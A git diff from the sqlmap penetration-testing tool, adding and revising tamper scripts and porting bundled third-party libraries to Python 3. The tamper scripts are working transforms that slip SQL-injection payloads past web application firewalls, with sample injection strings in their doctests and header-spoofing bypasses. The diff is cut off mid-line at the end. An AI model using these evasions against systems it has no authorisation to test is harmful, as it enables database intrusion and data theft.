- * Input: SELECT id FROM users - * Output: SELECT+id+FROM+users - Notes: - * Is this any useful? The plus get's url-encoded by sqlmap engine - invalidating the query afterwards + * Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the query afterwards * This tamper script works against all databases + + >>> tamper('SELECT id FROM users') + 'SELECT+id+FROM+users' """ retVal = payload diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py index 4114cf2a137..cbf162ffcd9 100644 --- a/tamper/space2randomblank.py +++ b/tamper/space2randomblank.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import random +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW @@ -16,12 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Example: - * Input: SELECT id FROM users - * Output: SELECT\rid\tFROM\nusers + Replaces space character (' ') with a random blank character from a valid set of alternate characters Tested against: * Microsoft SQL Server 2005 @@ -31,6 +27,10 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls + + >>> random.seed(0) + >>> tamper('SELECT id FROM users') + 'SELECT%0Did%0CFROM%0Ausers' """ # ASCII table: diff --git a/tamper/substring2leftright.py b/tamper/substring2leftright.py new file mode 100644 index 00000000000..9df851a584f --- /dev/null +++ b/tamper/substring2leftright.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces PostgreSQL SUBSTRING with LEFT and RIGHT + + Tested against: + * PostgreSQL 9.6.12 + + Note: + * Useful to bypass weak web application firewalls that filter SUBSTRING (but not LEFT and RIGHT) + + >>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)') + 'LEFT((SELECT usename FROM pg_user)::text,1)' + >>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)') + 'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)' + """ + + retVal = payload + + if payload: + match = re.search(r"SUBSTRING\((.+?)\s+FROM[^)]+(\d+)[^)]+FOR[^)]+1\)", payload) + + if match: + pos = int(match.group(2)) + if pos == 1: + _ = "LEFT(%s,1)" % (match.group(1)) + else: + _ = "LEFT(RIGHT(%s,%d),1)" % (match.group(1), 1 - pos) + + retVal = retVal.replace(match.group(0), _) + + return retVal diff --git a/tamper/symboliclogical.py b/tamper/symboliclogical.py new file mode 100644 index 00000000000..c7588aeb02a --- /dev/null +++ b/tamper/symboliclogical.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) + + >>> tamper("1 AND '1'='1") + "1 %26%26 '1'='1" + """ + + retVal = payload + + if payload: + retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload)) + + return retVal diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py index 8421176dec4..16e4ab7d477 100644 --- a/tamper/unionalltounion.py +++ b/tamper/unionalltounion.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import PRIORITY @@ -14,11 +14,10 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces UNION ALL SELECT with UNION SELECT + Replaces instances of UNION ALL SELECT with UNION SELECT counterpart - Example: - * Input: -1 UNION ALL SELECT - * Output: -1 UNION SELECT + >>> tamper('-1 UNION ALL SELECT') + '-1 UNION SELECT' """ return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py index 9170e664268..5ccde715b9d 100644 --- a/tamper/unmagicquotes.py +++ b/tamper/unmagicquotes.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL @@ -16,18 +17,16 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces quote character (') with a multi-byte combo %bf%27 together with - generic comment at the end (to make it work) - - Example: - * Input: 1' AND 1=1 - * Output: 1%bf%27 AND 1=1--%20 + Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work) Notes: * Useful for bypassing magic_quotes/addslashes feature Reference: * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string + + >>> tamper("1' AND 1=1") + '1%bf%27-- -' """ retVal = payload @@ -45,7 +44,10 @@ def tamper(payload, **kwargs): continue if found: - retVal = re.sub("\s*(AND|OR)[\s(]+'[^']+'\s*(=|LIKE)\s*'.*", "", retVal) - retVal += "-- " - + _ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal) + if _ != retVal: + retVal = _ + retVal += "-- -" + elif not any(_ in retVal for _ in ('#', '--', '/*')): + retVal += "-- -" return retVal diff --git a/tamper/uppercase.py b/tamper/uppercase.py new file mode 100644 index 00000000000..81774a99968 --- /dev/null +++ b/tamper/uppercase.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each keyword character with upper case value (e.g. select -> SELECT) + + Tested against: + * Microsoft SQL Server 2005 + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that has poorly written permissive regular expressions + * This tamper script should work against all (?) databases + + >>> tamper('insert') + 'INSERT' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"[A-Za-z_]+", retVal): + word = match.group() + + if word.upper() in kb.keywords: + retVal = retVal.replace(word, word.upper()) + + return retVal diff --git a/tamper/varnish.py b/tamper/varnish.py new file mode 100644 index 00000000000..92fb98cb3fd --- /dev/null +++ b/tamper/varnish.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall + + Reference: + * https://web.archive.org/web/20160815052159/http://community.hpe.com/t5/Protect-Your-Assets/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 + + Notes: + Examples: + >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X) + >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X) + >> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1) + >> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X) + >> X-remote-IP: * or %00 or %0A + """ + + headers = kwargs.get("headers", {}) + headers["X-originating-IP"] = "127.0.0.1" + return payload diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py index b2d392fd357..7ab70933198 100644 --- a/tamper/versionedkeywords.py +++ b/tamper/versionedkeywords.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -20,11 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Encloses each non-function keyword with versioned MySQL comment - - Example: - * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))# - * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))# + Encloses each non-function keyword with (MySQL) versioned comment Requirement: * MySQL @@ -35,6 +31,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls when the back-end database management system is MySQL + + >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#') + '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#' """ def process(match): @@ -47,7 +46,7 @@ def process(match): retVal = payload if payload: - retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal) + retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal) retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") return retVal diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py index 6cad83a77e8..aea7d50e598 100644 --- a/tamper/versionedmorekeywords.py +++ b/tamper/versionedmorekeywords.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -21,11 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Encloses each keyword with versioned MySQL comment - - Example: - * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# - * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))# + Encloses each keyword with (MySQL) versioned comment Requirement: * MySQL >= 5.1.13 @@ -36,6 +32,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls when the back-end database management system is MySQL + + >>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#') + '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' """ def process(match): @@ -48,7 +47,7 @@ def process(match): retVal = payload if payload: - retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) + retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, retVal) retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/") return retVal diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py new file mode 100644 index 00000000000..110bbbfd6f1 --- /dev/null +++ b/tamper/xforwardedfor.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import random + +from lib.core.compat import xrange +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def randomIP(): + octets = [] + + while not octets or octets[0] in (10, 172, 192): + octets = random.sample(xrange(1, 255), 4) + + return '.'.join(str(_) for _ in octets) + +def tamper(payload, **kwargs): + """ + Append a fake HTTP header 'X-Forwarded-For' (and alike) + """ + + headers = kwargs.get("headers", {}) + headers["X-Forwarded-For"] = randomIP() + headers["X-Client-Ip"] = randomIP() + headers["X-Real-Ip"] = randomIP() + headers["CF-Connecting-IP"] = randomIP() + headers["True-Client-IP"] = randomIP() + + # Reference: https://developer.chrome.com/multidevice/data-compression-for-isps#proxy-connection + headers["Via"] = "1.1 Chrome-Compression-Proxy" + + # Reference: https://wordpress.org/support/topic/blocked-country-gaining-access-via-cloudflare/#post-9812007 + headers["CF-IPCountry"] = random.sample(('GB', 'US', 'FR', 'AU', 'CA', 'NZ', 'BE', 'DK', 'FI', 'IE', 'AT', 'IT', 'LU', 'NL', 'NO', 'PT', 'SE', 'ES', 'CH'), 1)[0] + + return payload diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index c4db309af76..4d9731c1b68 100644 --- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -1,12 +1,26 @@ # # Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. +# (Note: 2018 modifications by @stamparm) # -import ctypes + import logging -import os import re +import sys + +from lib.core.settings import IS_WIN + +if IS_WIN: + import ctypes + import ctypes.wintypes -from lib.core.convert import stdoutencode + # Reference: https://gist.github.com/vsajip/758430 + # https://github.com/ipython/ipython/issues/4252 + # https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx + ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD] + ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL + +def stdoutEncode(data): # Cross-referenced function + return data class ColorizingStreamHandler(logging.StreamHandler): # color names to indices @@ -22,24 +36,16 @@ class ColorizingStreamHandler(logging.StreamHandler): } # levels to (background, foreground, bold/intense) - if os.name == 'nt': - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } - else: - level_map = { - logging.DEBUG: (None, 'blue', False), - logging.INFO: (None, 'green', False), - logging.WARNING: (None, 'yellow', False), - logging.ERROR: (None, 'red', False), - logging.CRITICAL: ('red', 'white', False) - } + level_map = { + logging.DEBUG: (None, 'blue', False), + logging.INFO: (None, 'green', False), + logging.WARNING: (None, 'yellow', False), + logging.ERROR: (None, 'red', False), + logging.CRITICAL: ('red', 'white', False) + } csi = '\x1b[' reset = '\x1b[0m' + bold = "\x1b[1m" disable_coloring = False @property @@ -49,7 +55,7 @@ def is_tty(self): def emit(self, record): try: - message = stdoutencode(self.format(record)) + message = stdoutEncode(self.format(record)) stream = self.stream if not self.is_tty: @@ -63,10 +69,12 @@ def emit(self, record): self.flush() except (KeyboardInterrupt, SystemExit): raise + except IOError: + pass except: self.handleError(record) - if os.name != 'nt': + if not IS_WIN: def output_colorized(self, message): self.stream.write(message) else: @@ -85,7 +93,6 @@ def output_colorized(self, message): def output_colorized(self, message): parts = self.ansi_esc.split(message) - write = self.stream.write h = None fd = getattr(self.stream, 'fileno', None) @@ -99,7 +106,8 @@ def output_colorized(self, message): text = parts.pop(0) if text: - write(text) + self.stream.write(text) + self.stream.flush() if parts: params = parts.pop(0) @@ -122,9 +130,19 @@ def output_colorized(self, message): ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) - def colorize(self, message, record): - if record.levelno in self.level_map and self.is_tty: - bg, fg, bold = self.level_map[record.levelno] + def _reset(self, message): + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + + return reset + + def colorize(self, message, levelno): + if levelno in self.level_map and self.is_tty: + bg, fg, bold = self.level_map[levelno] params = [] if bg in self.color_map: @@ -150,4 +168,4 @@ def colorize(self, message, record): def format(self, record): message = logging.StreamHandler.format(self, record) - return self.colorize(message, record) + return self.colorize(message, record.levelno) diff --git a/thirdparty/beautifulsoup/__init__.py b/thirdparty/beautifulsoup/__init__.py index 7954a3d0a47..a905a4ce403 100644 --- a/thirdparty/beautifulsoup/__init__.py +++ b/thirdparty/beautifulsoup/__init__.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python +#!/usr/bin/env python2 # # Copyright (c) 2004-2010, Leonard Richardson # @@ -16,7 +16,7 @@ # disclaimer in the documentation and/or other materials provided # with the distribution. # -# * Neither the name of the the Beautiful Soup Consortium and All +# * Neither the name of the Beautiful Soup Consortium and All # Night Kosher Bakery nor the names of its contributors may be # used to endorse or promote products derived from this software # without specific prior written permission. diff --git a/thirdparty/beautifulsoup/beautifulsoup.py b/thirdparty/beautifulsoup/beautifulsoup.py index cde92ee112c..849956bb0e2 100644 --- a/thirdparty/beautifulsoup/beautifulsoup.py +++ b/thirdparty/beautifulsoup/beautifulsoup.py @@ -58,7 +58,7 @@ disclaimer in the documentation and/or other materials provided with the distribution. - * Neither the name of the the Beautiful Soup Consortium and All + * Neither the name of the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. @@ -77,27 +77,47 @@ """ from __future__ import generators +from __future__ import print_function __author__ = "Leonard Richardson (leonardr@segfault.org)" -__version__ = "3.2.0" -__copyright__ = "Copyright (c) 2004-2010 Leonard Richardson" +__version__ = "3.2.1b" +__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson" __license__ = "New-style BSD" -from sgmllib import SGMLParser, SGMLParseError import codecs -import markupbase -import types import re -import sgmllib +import sys + +if sys.version_info >= (3, 0): + xrange = range + text_type = str + binary_type = bytes + basestring = str + unichr = chr +else: + text_type = unicode + binary_type = str + try: - from htmlentitydefs import name2codepoint + from html.entities import name2codepoint except ImportError: - name2codepoint = {} + from htmlentitydefs import name2codepoint + try: set except NameError: from sets import Set as set +try: + import sgmllib +except ImportError: + from lib.utils import sgmllib + +try: + import markupbase +except ImportError: + import _markupbase as markupbase + #These hacks make Beautiful Soup able to parse XML with namespaces sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match @@ -106,7 +126,7 @@ def _match_css_class(str): """Build a RE to match the given CSS class.""" - return re.compile(r"(^|.*\s)%s($|\s)" % str) + return re.compile(r"(^|.*\s)%s($|\s)" % re.escape(str)) # First, the classes that represent markup elements. @@ -114,6 +134,21 @@ class PageElement(object): """Contains the navigational information for some part of the page (either a tag or a piece of text)""" + def _invert(h): + "Cheap function to invert a hash." + i = {} + for k,v in h.items(): + i[v] = k + return i + + XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", + "quot" : '"', + "amp" : "&", + "lt" : "<", + "gt" : ">" } + + XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) + def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" @@ -355,7 +390,7 @@ def _findAll(self, name, attrs, text, limit, generator, **kwargs): g = generator() while True: try: - i = g.next() + i = next(g) except StopIteration: break if i: @@ -406,22 +441,24 @@ def substituteEncoding(self, str, encoding=None): def toEncoding(self, s, encoding=None): """Encodes an object to a string in some encoding, or to Unicode. .""" - if isinstance(s, unicode): - if encoding: - s = s.encode(encoding) - elif isinstance(s, str): + if isinstance(s, text_type): if encoding: s = s.encode(encoding) - else: - s = unicode(s) + elif isinstance(s, binary_type): + s = s.encode(encoding or "utf8") else: - if encoding: - s = self.toEncoding(str(s), encoding) - else: - s = unicode(s) + s = self.toEncoding(str(s), encoding or "utf8") return s -class NavigableString(unicode, PageElement): + BARE_AMPERSAND_OR_BRACKET = re.compile(r"([<>]|&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;))") + + def _sub_entity(self, x): + """Used with a regular expression to substitute the + appropriate XML entity for an XML special character.""" + return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" + + +class NavigableString(text_type, PageElement): def __new__(cls, value): """Create a new NavigableString. @@ -431,9 +468,9 @@ def __new__(cls, value): passed in to the superclass's __new__ or the superclass won't know how to handle non-ASCII characters. """ - if isinstance(value, unicode): - return unicode.__new__(cls, value) - return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) + if isinstance(value, text_type): + return text_type.__new__(cls, value) + return text_type.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) def __getnewargs__(self): return (NavigableString.__str__(self),) @@ -445,16 +482,18 @@ def __getattr__(self, attr): if attr == 'string': return self else: - raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) + raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)) def __unicode__(self): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): - if encoding: - return self.encode(encoding) + # Substitute outgoing XML entities. + data = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, self) + if encoding and sys.version_info < (3, 0): + return data.encode(encoding) else: - return self + return data class CData(NavigableString): @@ -480,45 +519,34 @@ class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" - def _invert(h): - "Cheap function to invert a hash." - i = {} - for k,v in h.items(): - i[v] = k - return i - - XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", - "quot" : '"', - "amp" : "&", - "lt" : "<", - "gt" : ">" } - - XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) - def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" - x = match.group(1) - if self.convertHTMLEntities and x in name2codepoint: - return unichr(name2codepoint[x]) - elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: - if self.convertXMLEntities: - return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] - else: - return u'&%s;' % x - elif len(x) > 0 and x[0] == '#': - # Handle numeric entities - if len(x) > 1 and x[1] == 'x': - return unichr(int(x[2:], 16)) - else: - return unichr(int(x[1:])) + try: + x = match.group(1) + if self.convertHTMLEntities and x in name2codepoint: + return unichr(name2codepoint[x]) + elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: + if self.convertXMLEntities: + return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] + else: + return u'&%s;' % x + elif len(x) > 0 and x[0] == '#': + # Handle numeric entities + if len(x) > 1 and x[1] == 'x': + return unichr(int(x[2:], 16)) + else: + return unichr(int(x[1:])) - elif self.escapeUnrecognizedEntities: - return u'&%s;' % x - else: - return u'&%s;' % x + elif self.escapeUnrecognizedEntities: + return u'&%s;' % x + + except ValueError: # e.g. ValueError: unichr() arg not in range(0x10000) + pass + + return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): @@ -543,10 +571,11 @@ def __init__(self, parser, name, attrs=None, parent=None, self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities # Convert any HTML, XML, or numeric entities in the attribute values. - convert = lambda(k, val): (k, - re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", - self._convertEntities, - val)) + # Reference: https://github.com/pkrumins/xgoogle/pull/16/commits/3dba1165c436b0d6e5bdbd09e53ca0dbf8a043f8 + convert = lambda k_val: (k_val[0], + re.sub(r"&(#\d+|#x[0-9a-fA-F]+|\w+);", + self._convertEntities, + k_val[1])) self.attrs = map(convert, self.attrs) def getString(self): @@ -567,7 +596,7 @@ def getText(self, separator=u""): stopNode = self._lastRecursiveChild().next strings = [] current = self.contents[0] - while current is not stopNode: + while current and current is not stopNode: if isinstance(current, NavigableString): strings.append(current.strip()) current = current.next @@ -644,7 +673,7 @@ def __call__(self, *args, **kwargs): """Calling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.""" - return apply(self.findAll, args, kwargs) + return self.findAll(*args, **kwargs) def __getattr__(self, tag): #print "Getattr %s.%s" % (self.__class__, tag) @@ -652,7 +681,7 @@ def __getattr__(self, tag): return self.find(tag[:-3]) elif tag.find('__') != 0: return self.find(tag) - raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) + raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__, tag)) def __eq__(self, other): """Returns true iff this tag has the same name, the same attributes, @@ -681,15 +710,6 @@ def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): def __unicode__(self): return self.__str__(None) - BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" - + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" - + ")") - - def _sub_entity(self, x): - """Used with a regular expression to substitute the - appropriate XML entity for an XML special character.""" - return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and @@ -814,6 +834,7 @@ def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, s.append(text) if prettyPrint: s.append("\n") + return ''.join(s) #Soup methods @@ -874,10 +895,10 @@ def childGenerator(self): def recursiveChildGenerator(self): if not len(self.contents): - raise StopIteration + return # Note: https://stackoverflow.com/a/30217723 (PEP 479) stopNode = self._lastRecursiveChild().next current = self.contents[0] - while current is not stopNode: + while current and current is not stopNode: yield current current = current.next @@ -967,8 +988,8 @@ def search(self, markup): if self._matches(markup, self.text): found = markup else: - raise Exception, "I don't know how to match against a %s" \ - % markup.__class__ + raise Exception("I don't know how to match against a %s" \ + % markup.__class__) return found def _matches(self, markup, matchAgainst): @@ -984,7 +1005,7 @@ def _matches(self, markup, matchAgainst): if isinstance(markup, Tag): markup = markup.name if markup and not isinstance(markup, basestring): - markup = unicode(markup) + markup = text_type(markup) #Now we know that chunk is either a string, or None. if hasattr(matchAgainst, 'match'): # It's a regexp object. @@ -994,8 +1015,8 @@ def _matches(self, markup, matchAgainst): elif hasattr(matchAgainst, 'items'): result = markup.has_key(matchAgainst) elif matchAgainst and isinstance(markup, basestring): - if isinstance(markup, unicode): - matchAgainst = unicode(matchAgainst) + if isinstance(markup, text_type): + matchAgainst = text_type(matchAgainst) else: matchAgainst = str(matchAgainst) @@ -1033,7 +1054,7 @@ def buildTagMap(default, *args): # Now, the parser classes. -class BeautifulStoneSoup(Tag, SGMLParser): +class BeautifulStoneSoup(Tag, sgmllib.SGMLParser): """This class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the @@ -1057,9 +1078,9 @@ class BeautifulStoneSoup(Tag, SGMLParser): QUOTE_TAGS = {} PRESERVE_WHITESPACE_TAGS = [] - MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), + MARKUP_MASSAGE = [(re.compile(r'(<[^<>]*)/>'), lambda x: x.group(1) + ' />'), - (re.compile('<!\s+([^<>]*)>'), + (re.compile(r'<!\s+([^<>]*)>'), lambda x: '<!' + x.group(1) + '>') ] @@ -1134,7 +1155,7 @@ class has some tricks for dealing with some HTML that kills self.escapeUnrecognizedEntities = False self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) - SGMLParser.__init__(self) + sgmllib.SGMLParser.__init__(self) if hasattr(markup, 'read'): # It's a file-type object. markup = markup.read() @@ -1159,7 +1180,7 @@ def convert_charref(self, name): def _feed(self, inDocumentEncoding=None, isHTML=False): # Convert the document to Unicode. markup = self.markup - if isinstance(markup, unicode): + if isinstance(markup, text_type): if not hasattr(self, 'originalEncoding'): self.originalEncoding = None else: @@ -1183,7 +1204,7 @@ def _feed(self, inDocumentEncoding=None, isHTML=False): del(self.markupMassage) self.reset() - SGMLParser.feed(self, markup) + sgmllib.SGMLParser.feed(self, markup) # Close out any unfinished strings and close all the open tags. self.endData() while self.currentTag.name != self.ROOT_TAG_NAME: @@ -1196,7 +1217,7 @@ def __getattr__(self, methodName): if methodName.startswith('start_') or methodName.startswith('end_') \ or methodName.startswith('do_'): - return SGMLParser.__getattr__(self, methodName) + return sgmllib.SGMLParser.__getattr__(self, methodName) elif not methodName.startswith('__'): return Tag.__getattr__(self, methodName) else: @@ -1205,13 +1226,13 @@ def __getattr__(self, methodName): def isSelfClosingTag(self, name): """Returns true iff the given string is the name of a self-closing tag according to this parser.""" - return self.SELF_CLOSING_TAGS.has_key(name) \ - or self.instanceSelfClosingTags.has_key(name) + return name in self.SELF_CLOSING_TAGS \ + or name in self.instanceSelfClosingTags def reset(self): Tag.__init__(self, self, self.ROOT_TAG_NAME) self.hidden = 1 - SGMLParser.reset(self) + sgmllib.SGMLParser.reset(self) self.currentData = [] self.currentTag = None self.tagStack = [] @@ -1298,7 +1319,7 @@ def _smartPop(self, name): nestingResetTriggers = self.NESTABLE_TAGS.get(name) isNestable 